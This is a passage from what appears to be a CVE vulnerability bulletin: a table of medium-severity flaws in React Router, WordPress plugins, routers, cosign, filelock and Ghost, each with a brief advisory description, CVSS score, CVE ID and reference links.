| remix-run--react-router | React Router is a router for React. In @remix-run/server-runtime version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, React Router (or Remix v2) is vulnerable to CSRF attacks on document POST requests to UI routes when using server-side route action handlers in Framework Mode, or when using React Server Actions in the new unstable RSC modes. There is no impact if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/server-runtime version 2.17.3 and react-router version 7.12.0. | 2026-01-10 | 6.5 | CVE-2026-22030 | https://github.com/remix-run/react-router/security/advisories/GHSA-h5cw-625j-3rxh |
| roxnor--EmailKit Email Customizer for WooCommerce & WP | The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read via Path Traversal in all versions up to, and including, 1.6.1. This is due to missing path validation in the create_template REST API endpoint where user-controlled input from the emailkit-editor-template parameter is passed directly to file_get_contents() without sanitization. This makes it possible for authenticated attackers with Author-level permissions or higher to read arbitrary files on the server, including sensitive configuration files like /etc/passwd and wp-config.php, via the REST API. The file contents are stored in post meta and can be exfiltrated through MetForm's email confirmation feature. | 2026-01-07 | 6.5 | CVE-2025-14059 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91ebe8cb-99ec-4380-a77e-17e17144a17e?source=cve https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419280%40emailkit%2Ftrunk&old=3373383%40emailkit%2Ftrunk&sfp_email=&sfph_mail=#file1 |
| roxnor--Popup builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers | The Popupkit plugin for WordPress is vulnerable to arbitrary subscriber data deletion due to missing authorization on the DELETE `/subscribers` REST API endpoint in all versions up to, and including, 2.2.0. This is due to the `permission_callback` only validating wp_rest nonce without checking user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary subscriber records. | 2026-01-06 | 5.3 | CVE-2025-14441 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48f5a44d-d01f-4c41-98da-7c1f6c65c254?source=cve https://plugins.trac.wordpress.org/browser/popup-builder-block/trunk/includes/Routes/Subscribers.php#L77 https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.2.0/includes/Routes/Subscribers.php#L77 https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.2.0/includes/Routes/Subscribers.php#L64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421671%40popup-builder-block&new=3421671%40popup-builder-block&sfp_email=&sfph_mail= |
| rubengc--GamiPress Gamification plugin to reward points, achievements, badges & ranks in WordPress | The GamiPress - Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the gamipress_ajax_get_posts and gamipress_ajax_get_users functions in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate users, including their email addresses and to retrieve titles of private posts. | 2026-01-06 | 4.3 | CVE-2025-13812 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acfdd579-0be9-476b-90cd-07f417712691?source=cve https://plugins.trac.wordpress.org/changeset/3430697/ |
| ruhul080--My Album Gallery | The My Album Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style_css' shortcode attribute in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14453 | https://www.wordfence.com/threat-intel/vulnerabilities/id/64399c1c-ea82-483b-b320-3c6f2cb010b3?source=cve https://plugins.trac.wordpress.org/browser/my-album-gallery/trunk/controllers/public/class-mygallery-shortcode.php#L121 https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/controllers/public/class-mygallery-shortcode.php#L121 |
| ruhul080--My Album Gallery | The My Album Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image titles in all versions up to, and including, 1.0.4. This is due to insufficient input sanitization and output escaping on the 'attachment->title' attribute. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14796 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd0bb5b-2eb5-46f0-8942-2885b1138b70?source=cve https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/mygallery-single.php#L92 https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/controllers/public/class-mygallery-shortcode.php#L143 |
| RustCrypto--signatures | RustCrypto: Signatures offers support for digital signatures, which provide authentication of data using public-key cryptography. Prior to version 0.1.0-rc.2, a timing side-channel was discovered in the Decompose algorithm which is used during ML-DSA signing to generate hints for the signature. This issue has been patched in version 0.1.0-rc.2. | 2026-01-10 | 6.4 | CVE-2026-22705 | https://github.com/RustCrypto/signatures/security/advisories/GHSA-hcp2-x6j4-29j7 https://github.com/RustCrypto/signatures/pull/1144 https://github.com/RustCrypto/signatures/commit/035d9eef98486ecd00a8bf418c7817eb14dd6558 |
| samikeijonen--EDD Download Info | The EDD Download Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'edd_download_info_link' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14121 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c0290595-d74d-404e-9d28-75abc9055031?source=cve https://plugins.trac.wordpress.org/browser/edd-download-info/trunk/includes/shortcodes.php#L43 https://plugins.trac.wordpress.org/browser/edd-download-info/tags/1.1/includes/shortcodes.php#L43 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read in libimagecodec.quram.so prior to SMR Jan-2026 Release 1 allows remote attacker to access out-of-bounds memory. | 2026-01-09 | 5.3 | CVE-2026-20973 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Secure Computing--SnapGear Management Console SG560 | SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the edit_config_files CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/edit_config_files to access and modify files outside the intended /etc/config/ directory. | 2026-01-06 | 6.5 | CVE-2020-36909 | ExploitDB-48556 Zero Science Lab Disclosure (ZSL-2020-5568) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Secure Computing SnapGear Management Console SG560 3.1.5 Arbitrary File Read/Write |
| Secure Computing--SnapGear Management Console SG560 | SnapGear Management Console SG560 version 3.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft a malicious web page that automatically submits a form to create a new super user account with full administrative privileges when a logged-in user visits the page. | 2026-01-06 | 5.3 | CVE-2020-36908 | ExploitDB-48554 Zero Science Lab Disclosure (ZSL-2020-5567) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Secure Computing SnapGear Management Console SG560 3.1.5 Cross-Site Request Forgery via Admin Users |
| sergiotoca--STM Gallery 1.9 | The STM Gallery 1.9 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'composicion' parameter in all versions up to, and including, 0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13848 | https://www.wordfence.com/threat-intel/vulnerabilities/id/393d6e4a-af05-48ac-8921-f298932245a4?source=cve https://plugins.trac.wordpress.org/browser/stm-gallery/trunk/stmgallery_v.0.9.php#L121 https://plugins.trac.wordpress.org/browser/stm-gallery/tags/0.9/stmgallery_v.0.9.php#L121 |
| sfturing--hosp_order | A vulnerability was identified in sfturing hosp_order up to 627f426331da8086ce8fff2017d65b1ddef384f8. Affected by this vulnerability is the function findOrderHosNum of the file /ssm_pro/orderHos/. Such manipulation of the argument hospitalAddress/hospitalName leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.3 | CVE-2025-15450 | VDB-339483 | sfturing hosp_order orderHos findOrderHosNum sql injection VDB-339483 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722925 | https://github.com/sfturing/hosp_order hosp_order latest SQL Injection https://github.com/sfturing/hosp_order/issues/111 https://github.com/sfturing/hosp_order/issues/111#issue-3760306826 |
| sharethis--ShareThis Dashboard for Google Analytics | The ShareThis Dashboard for Google Analytics plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.4. This is due to the Google Analytics client_ID and client_secret being stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to craft a link to the sharethis.com server, which will share an authorization token for Google Analytics with a malicious website, if the attacker can trick an administrator logged into the website and Google Analytics to click the link. | 2026-01-07 | 4.7 | CVE-2025-12540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6781dcc5-db95-43ca-9042-a3c05414b7e6?source=cve https://plugins.trac.wordpress.org/browser/googleanalytics/trunk/credentials.json?rev=3364575 |
| shoheitanaka--Japanized for WooCommerce | The Japanized for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `order` REST API endpoint in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to mark any WooCommerce order as processed/completed. | 2026-01-09 | 5.3 | CVE-2025-14886 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4bf3248a-f235-472c-b751-96ac9838b27f?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-for-japan/tags/2.7.17/includes/gateways/paidy/class-wc-paidy-endpoint.php#L51 |
| SigmaPlugin--Advanced Database Cleaner PRO | Path Traversal: '.../...//' vulnerability in SigmaPlugin Advanced Database Cleaner PRO allows Path Traversal.This issue affects Advanced Database Cleaner PRO: from n/a through 3.2.10. | 2026-01-07 | 6.4 | CVE-2025-46256 | https://patchstack.com/database/wordpress/plugin/advanced-database-cleaner-pro/vulnerability/wordpress-advanced-database-cleaner-pro-plugin-3-2-10-limited-txt-path-traversal-vulnerability?_s_id=cve |
| sigstore--cosign | Cosign provides code signing and transparency for containers and binaries. Prior to versions 2.6.2 and 3.0.4, Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's public key from either a Fulcio certificate or provided by the user, and the artifact signature to the Rekor entry contents. Without these comparisons, Cosign would accept any response from Rekor as valid. A malicious actor that has compromised a user's identity or signing key could construct a valid Cosign bundle by including any arbitrary Rekor entry, thus preventing the user from being able to audit the signing event. This issue has been patched in versions 2.6.2 and 3.0.4. | 2026-01-10 | 5.5 | CVE-2026-22703 | https://github.com/sigstore/cosign/security/advisories/GHSA-whqx-f9j3-ch6m https://github.com/sigstore/cosign/pull/4623 https://github.com/sigstore/cosign/commit/6832fba4928c1ad69400235bbc41212de5006176 |
| smjrifle--SVG Map Plugin | The SVG Map Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on multiple AJAX actions including 'save_data', 'delete_data', and 'add_popup'. This makes it possible for unauthenticated attackers to update the plugin's settings, delete map data, and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-13519 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5aaa97cc-4deb-43b6-957d-587834eca125?source=cve https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/trunk/svg-map-by-saedi.php#L90 https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/tags/1.0.0/svg-map-by-saedi.php#L90 |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains a cross-site scripting vulnerability in the 'senddata' POST parameter of logged_page.php that allows attackers to inject malicious scripts. Attackers can exploit this weakness by sending crafted POST requests to execute arbitrary HTML and script code in a victim's browser session. | 2026-01-07 | 6.1 | CVE-2019-25270 | Zero Science Lab Vulnerability Entry Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange SOCA Vendor Homepage |
| soniz--Curved Text | The Curved Text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'radius' parameter of the arctext shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13854 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48514fdb-20c6-4a7f-8f60-e532ddd8853e?source=cve https://plugins.trac.wordpress.org/browser/curved-text/trunk/curved-text.php#L32 https://plugins.trac.wordpress.org/browser/curved-text/tags/0.1/curved-text.php#L32 |
| spree--spree | Spree is an open source e-commerce solution built with Ruby on Rails. Prior to versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5, an Authenticated Insecure Direct Object Reference (IDOR) vulnerability was identified that allows an authenticated user to retrieve other users' address information by modifying an existing order. By editing an order they legitimately own and manipulating address identifiers in the request, the backend server accepts and processes references to addresses belonging to other users, subsequently associating those addresses with the attacker's order and returning them in the response. This issue has been patched in versions 4.10.2, 5.0.7, 5.1.9, and 5.2.5. | 2026-01-08 | 6.5 | CVE-2026-22588 | https://github.com/spree/spree/security/advisories/GHSA-g268-72p7-9j6j https://github.com/spree/spree/commit/02acabdce2c5f14fd687335b068d901a957a7e72 https://github.com/spree/spree/commit/17e78a91b736b49dbea8d1bb1223c284383ee5f3 https://github.com/spree/spree/commit/b409c0fd327e7ce37f63238894670d07079eefe8 https://github.com/spree/spree/commit/d3f961c442e0015661535cbd6eb22475f76d2dc7 |
| spwebguy--Responsive Pricing Table | The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'plan_icons' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13418 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5d28fd23-fa86-4353-b1b4-af61192f8482?source=cve https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/ |
| spwebguy--Responsive Pricing Table | The Responsive Pricing Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'table_currency' parameter in all versions up to, and including, 5.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-15058 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e20a34e5-6c1c-4f12-b1d8-aa4b40a5dd00?source=cve https://wordpress.org/plugins/dk-pricr-responsive-pricing-table/ |
| stevejburge--TaxoPress: Tag, Category, and Taxonomy Manager AI Autotagger | The Tag, Category, and Taxonomy Manager - AI Autotagger with OpenAI plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the taxopress_ai_add_post_term function in all versions up to, and including, 3.41.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to add or remove taxonomy terms (tags, categories) on any post, including ones they do not own. | 2026-01-06 | 4.3 | CVE-2025-14371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ef51ffb-df1e-442d-abc8-3a0308099a0b?source=cve https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L681 |
| stylemix--MasterStudy LMS WordPress Plugin for Online Courses and Education | The MasterStudy LMS WordPress Plugin - for Online Courses and Education plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability checks on multiple REST API endpoints in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload or delete arbitrary media files, delete or modify posts, and create/manage course templates | 2026-01-06 | 5.4 | CVE-2025-13766 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2719739a-90dc-470b-9270-8578e0cead59?source=cve https://plugins.trac.wordpress.org/changeset/3422825/ |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms - Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.1.7. This is due to missing capability checks on the `fluentform_ai_create_form` AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary forms via the publicly exposed AI builder. | 2026-01-07 | 5.3 | CVE-2025-13722 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7dbf179-7099-4dfb-8dad-780f996a7005?source=cve https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Ai/AiFormBuilder.php |
| Tenda--AC1206 | A vulnerability was determined in Tenda AC1206 15.03.06.23. Affected by this issue is the function formBehaviorManager of the file /goform/BehaviorManager of the component httpd. Executing a manipulation of the argument modulename/option/data/switch can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-05 | 6.3 | CVE-2026-0581 | VDB-339473 | Tenda AC1206 httpd BehaviorManager formBehaviorManager command injection VDB-339473 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731193 | Tenda AC1206 AC1206V1.0RTL_V15.03.06.23 Command Injection https://github.com/ccc-iotsec/cve-/blob/Tenda/Tenda%20AC1206%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md https://www.tenda.com.cn/ |
| tfrommen--Page Keys | The Page Keys plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_key' parameter in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-15000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d3863ec-0cc7-4128-a19e-fc1e2c31195e?source=cve https://plugins.trac.wordpress.org/browser/page-keys/tags/1.3.3/inc/ListTable.php#L260 |
| themehigh--Email Customizer for WooCommerce | Drag and Drop Email Templates Builder | The Email Customizer for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email template content in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in email templates that will execute when customers view transactional emails. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-13974 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6927b4f-f47e-47fc-a5bf-b7fa42c31412?source=cve https://plugins.trac.wordpress.org/browser/email-customizer-for-woocommerce/tags/2.6.7/classes/inc/class-wecmf-general-template.php#L213 https://plugins.trac.wordpress.org/browser/email-customizer-for-woocommerce/trunk/classes/inc/class-wecmf-general-template.php#L213 |
| ThemeHunk--Oneline Lite | Missing Authorization vulnerability in ThemeHunk Oneline Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Oneline Lite: from n/a through 6.6. | 2026-01-07 | 4.3 | CVE-2025-69344 | https://patchstack.com/database/wordpress/theme/oneline-lite/vulnerability/wordpress-oneline-lite-theme-6-6-broken-access-control-vulnerability?_s_id=cve |
| themelocation--WP Popup Magic | The WP Popup Magic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter of the [wppum_end] shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13900 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c11a5f07-de89-47ec-a92e-2adc75965648?source=cve https://plugins.trac.wordpress.org/browser/wppopupmagic/trunk/class-wppum-frontend.php#L622 https://plugins.trac.wordpress.org/browser/wppopupmagic/tags/1.0.0/class-wppum-frontend.php#L622 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_order_by_id() function in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate order IDs and exfiltrate sensitive data (PII), such as student name, email address, phone number, and billing address. | 2026-01-08 | 6.5 | CVE-2025-13679 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0830d0c3-99c0-423e-99ab-f0c1cbec52d9?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/tags/3.9.4/ecommerce/OrderController.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification and deletion of data due to a missing capability check on the 'bulk_action_handler' and 'coupon_permanent_delete' functions in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with subscriber level access and above, to delete, activate, deactivate, or trash arbitrary coupons. | 2026-01-09 | 4.3 | CVE-2025-13628 | https://www.wordfence.com/threat-intel/vulnerabilities/id/46f71f7b-7326-47b6-a23a-68a40f5bb56b?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/ecommerce/CouponController.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow. | 2026-01-09 | 4.3 | CVE-2025-13934 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5de212c9-5c2e-4713-b1ce-022dd84520c3?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course completion in all versions up to, and including, 3.9.2. This is due to missing enrollment verification in the 'mark_course_complete' function. This makes it possible for authenticated attackers, with subscriber level access and above, to mark any course as completed. | 2026-01-09 | 4.3 | CVE-2025-13935 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7b8b111a-9626-41f4-8a13-51f576af0257?source=cve https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in all versions up to, and including, 4.3.2. This makes it possible for unauthenticated attackers to modify course contents by adding/removing/updating/re-ordering sections or modifying section items. | 2026-01-06 | 5.3 | CVE-2025-13964 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae363511-8a1f-476a-9851-61f7763428c2?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/EditCurriculumAjax.php#L52 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.1/inc/Ajax/AbstractAjax.php#L18 |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin for WordPress is vulnerable to unauthorized file deletion in versions up to, and including, 4.3.2.2 via the /wp-json/lp/v1/material/{file_id} REST API endpoint. This is due to a parameter mismatch between the DELETE operation and authorization check, where the endpoint uses file_id from the URL path but the permission callback validates item_id from the request body. This makes it possible for authenticated attackers, with teacher-level access, to delete arbitrary lesson material files uploaded by other teachers via sending a DELETE request with their own item_id (to pass authorization) while targeting another teacher's file_id. | 2026-01-07 | 5.4 | CVE-2025-14802 | https://www.wordfence.com/threat-intel/vulnerabilities/id/884c4508-1ee1-4384-9fc2-29e2c9042426?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L527 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L405 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L77 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.3/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L403 |
| ThimPress--Thim Core | Cross-Site Request Forgery (CSRF) vulnerability in ThimPress Thim Core allows Cross Site Request Forgery.This issue affects Thim Core: from n/a through 2.3.3. | 2026-01-05 | 4.3 | CVE-2025-53344 | https://vdp.patchstack.com/database/wordpress/plugin/thim-core/vulnerability/wordpress-thim-core-plugin-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| tomiup--WP Recipe Manager | The WP Recipe Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Skill Level' input field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13667 | https://www.wordfence.com/threat-intel/vulnerabilities/id/12b14418-28f0-4786-b8f8-a637fe007b6c?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-manager/trunk/inc/libs/class.metaboxes.php#L203 https://plugins.trac.wordpress.org/browser/wp-recipe-manager/tags/1.0.0/inc/libs/class.metaboxes.php#L203 |
| top-position--Top Position Google Finance | The Top Position Google Finance plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13895 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fcbf81f8-8b33-4b83-91fb-626b7b5f3bb2?source=cve https://plugins.trac.wordpress.org/browser/top-position-google-finance/trunk/top-position-google-finance.php#L78 https://plugins.trac.wordpress.org/browser/top-position-google-finance/trunk/top-position-google-finance.php#L56 |
| TOTOLINK--WA1200 | A vulnerability has been found in TOTOLINK WA1200 5.9c.2914. The impacted element is an unknown function of the file cstecgi.cgi of the component HTTP Request Handler. The manipulation leads to null pointer dereference. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-01-08 | 5.3 | CVE-2026-0731 | VDB-340128 | TOTOLINK WA1200 HTTP Request cstecgi.cgi null pointer dereference VDB-340128 | CTI Indicators (IOB, IOC, IOA) Submit #733249 | TOTOLINK WA1200 V5.9c.2914 NULL Pointer Dereference https://github.com/JackWesleyy/CVE/blob/main/WA1200/TOTOLINK%20WA1200%20NULL%20Pointer%20Dereference%20Vulnerability.md https://github.com/JackWesleyy/CVE/blob/main/WA1200/TOTOLINK%20WA1200%20NULL%20Pointer%20Dereference%20Vulnerability.md#poc https://www.totolink.net/ |
| TOTOLINK--WA300 | A security vulnerability has been detected in TOTOLINK WA300 5.2cu.7112_B20190227. This vulnerability affects the function sub_401510 of the file cstecgi.cgi. The manipulation of the argument UPLOAD_FILENAME leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-01-06 | 6.3 | CVE-2026-0641 | VDB-339684 | TOTOLINK WA300 cstecgi.cgi sub_401510 command injection VDB-339684 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732234 | TOTOLINK WA300 V5.2cu.7112_B20190227 Command Injection https://github.com/JackWesleyy/CVE/blob/main/WA300/TOTOLINK_WA300_RCE.md https://github.com/JackWesleyy/CVE/blob/main/WA300/TOTOLINK_WA300_RCE.md#poc https://www.totolink.net/ |
| tox-dev--filelock | filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue has been patched in version 3.20.3. | 2026-01-10 | 5.3 | CVE-2026-22701 | https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0 https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5 |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.90.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's /ghost/api/admin/members/events endpoint allows users with authentication credentials for the Admin API to execute arbitrary SQL. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | 6.7 | CVE-2026-22596 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-gjrp-xgmh-x9qq https://github.com/TryGhost/Ghost/commit/cda236e455a7a30e828b6cba3c430e5796ded955 https://github.com/TryGhost/Ghost/commit/f2165f968bcdaae0e35590b38fa280ab03239391 |
